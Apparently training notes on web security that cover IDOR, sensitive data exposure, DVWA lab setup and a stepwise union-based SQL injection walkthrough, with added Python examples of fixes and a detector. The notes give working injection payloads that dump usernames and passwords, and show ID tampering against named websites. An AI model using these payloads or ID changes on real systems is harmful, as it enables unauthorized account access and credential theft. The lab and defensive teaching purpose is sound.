METHODS USED IN WEB APPLICATIONS
1. GET – The method a web application uses to request data from a specified resource. It is insecure in that all the data transmitted from the web application UI to its database or server is shown in the URL.
e.g. php?id=1, ?cat=54, ?test=query.
2. POST – The method that requests data from the database or server without showing it in the URL. e.g. twitter.com/login.php
INSECURE DIRECT OBJECT REFERENCE
A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or database key. Without an access control check or other protection, attackers can directly access unsecured files, configurations and settings that the administrator has neither authorized nor validated.
For example:
CHJM Website :
Accessing another user's account –
www.chjm.org/login/../php?id=1411 (entered into Logan's account)
Accessing pages which are not authorized to a basic user –
EG : arvindsharma.com > Login
URL > arvindsharma.com
/account/ > folder
user.php > code
1337 > Sanjeev Multani
Kshitij > 1111 > 1337 > Sanjeev's account (Kshitij, logged in as id 1111, changes the id to 1337 and lands in Sanjeev's account)
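The access-control check that is missing in the account example above, as an added example (not from the original notes or from either site mentioned): a minimal Python model of the /account/user.php?id= lookup, first as a plain direct object reference and then with the check. The users rows, the session id and the make_users_db helper are constructed sample data.

```python
# Added example (not from the original notes): a minimal model of the
# "/account/user.php?id=..." lookup, first as a direct object reference
# and then with the missing access-control check. The users table and
# the session user id are constructed sample data.
import sqlite3

def make_users_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1111, "Kshitij", "kshitij@example.invalid"),   # constructed rows
        (1337, "Sanjeev", "sanjeev@example.invalid"),
    ])
    return db

def account_insecure(db, requested_id):
    # Direct object reference: whatever id arrives in the query string is
    # looked up, so changing 1111 to 1337 returns another user's record.
    return db.execute("SELECT id, name, email FROM users WHERE id = ?",
                      (requested_id,)).fetchone()

def account_checked(db, session_user_id, raw_id):
    # Query-string values are text: validate the shape first, then check
    # that the reference belongs to the logged-in user before using it.
    if not raw_id.isdigit() or int(raw_id) != session_user_id:
        return None          # deny; a real app would log this and return 403
    # Query by the identity the server established at login, not the
    # value the client supplied.
    return db.execute("SELECT id, name, email FROM users WHERE id = ?",
                      (session_user_id,)).fetchone()
```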
SENSITIVE DATA EXPOSURE
Many web applications do not properly protect sensitive data such as names, IDs, credit card details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes. Such data should also be encrypted: if it is not encrypted and is in plain text, it is much easier for an attacker or any other individual to obtain it.
Types of Sensitive Data
1. Personal – Names, address, contact numbers etc.
2. Confidential – ID, passwords – credentials, Aadhaar No.
3. Financial – Bank account numbers, credit cards, debit cards etc.
4. Health Information – Policies etc.
Demonstration on LVS.
DVWA SETUP AND CONFIGURATION
DVWA stands for Damn Vulnerable Web Application. It is a PHP/MySQL based web application built for learning web application attacks from the OWASP Top 10 in an organised way, like LVS.
Copy the zip file into C:\xampp\htdocs
Right click the zip file and click on "Extract Here"
Start the XAMPP control panel, then start Apache and MySQL
Go to the dvwa directory in "htdocs", navigate to the config folder, open the config.php file and set the database password to "" (empty).
Open the browser and go to 127.0.0.1/dvwa
It will show the message "Click here to create the Database".
After clicking, the database has been created; "127.0.0.1/phpmyadmin" lists out all the databases.
Go through the Instruction Page of LVS and then start learning through it.
OWASP A1. INJECTIONS
UNION BASED SQL INJECTION
UNION BASED SQLI is a type of attack in which an attacker enters malicious SQL queries into an input of the web application; they reach the database and result in extraction of the "juicy" data.
DATABASE > TABLES > COLUMNS > ROWS
--+ : For any command I enter into the input method, I have to enter --+ after it to make it a SQL query.
table_name – name of the table
column_name – name of the column
The mother of information
1. Information Schema : It has all of the data regarding every database, table, column and every other detail of a database. It is considered the mother of information in a database.
2. --+ : Everything written with --+ would be acted on as a SQL query.
3. # : Everything entered after # will not be considered.
4. database() – name of the database
5. version() – version of the database.
Target – http://127.0.0.1/dvwa/vulnerabilities/sqli/
STEPS – For SQLi it is always recommended to use Firefox, as special symbols and spaces do not get converted into URL encoding.
Step 1: Find the GET method/parameter
Try clicking each and every possible link, or give inputs to the search boxes that use the GET method.
Step 2: Check whether my site is vulnerable to union-based SQLi or not
If we get an error, that means my website is vulnerable to union-based SQLi.
It will give – "http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' &Submit=Submit#
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1"
Step 3: To check the number of columns present in the database
order by 100--+
order by 200--+
order by 300--+
Until we get an error of "Unknown Order Clause".
Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Unknown column '3' in 'order clause'
Step 4: Union select the columns which are present in the database, to see which one is vulnerable
union select 1,2--+
http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select 1,2--+ &Submit=Submit#
Step 5: Extracting information from the database
– union select version(),2--+
– union select 1,version()--+
– union select all 1,version()--+ : 10.1.25-MariaDB
– union select all 1,database()--+ : dvwa
Step 6: Calling the mother of the database – information_schema
= Extracting table names
– union select all 1,table_name from information_schema.tables--+
http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all 1,table_name from information_schema.tables--+&Submit=Submit#
= After selecting a juicy table, extracting the column names of that table :
– column_name, information_schema.columns
– union select all 1,column_name from information_schema.columns where table_name="users"--+
= To get the data from the columns (user, password)
– union select user,password from users--+
– http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all group_concat(user,0x0a,password),2 from users--+
And we will get the juicy data.
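The union-select steps above, as an added example (not DVWA's own code): a SQLite copy of the DVWA lookup built with string formatting beside the parameterized fix, both run with the notes' step-6 payload, plus a small classifier that flags the step-3/4/6 probes in a request URL so they can be spotted in access logs. The users rows, the hash placeholders and the make_dvwa_db helper are constructed/assumed.

```python
# Added example (not DVWA's own code): the notes' union-select payload run
# against a constructed copy of the DVWA "sqli" lookup in SQLite, first
# built by string formatting (vulnerable) and then with a bound parameter
# (fixed), plus a detector for the step-3/4/6 probes in a request URL.
# The users rows and hash values are constructed sample data.
import re
import sqlite3
from urllib.parse import unquote_plus

def make_dvwa_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "admin", "admin", "HASH_ADMIN_PLACEHOLDER"),
        (2, "Gordon", "Brown", "gordonb", "HASH_GORDON_PLACEHOLDER"),
    ])
    return db

def lookup_vulnerable(db, user_id):
    # Same shape as the low-security DVWA query: the id is spliced into the
    # SQL text, so a quote ends the literal and the rest becomes SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # The id is bound as data; quotes and comment markers stay inside the value.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

# Step-6 payload exactly as the notes write it in the URL; unquote_plus turns
# the trailing "+" into the space that makes "-- " a valid SQL comment.
PAYLOAD = unquote_plus("1' union select user,password from users--+")

# Signatures of the probing stages described in steps 3, 4 and 6.
PROBES = [
    ("order-by column count", re.compile(r"order\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("information_schema", re.compile(r"information_schema\.", re.I)),
]

def classify_request(url):
    # Decode once, then report which injection stages appear in the request.
    decoded = unquote_plus(url)
    return [name for name, rx in PROBES if rx.search(decoded)]
```

The vulnerable lookup returns the user/password rows appended to the legitimate result, while the parameterized lookup returns nothing because the whole payload is compared as one value.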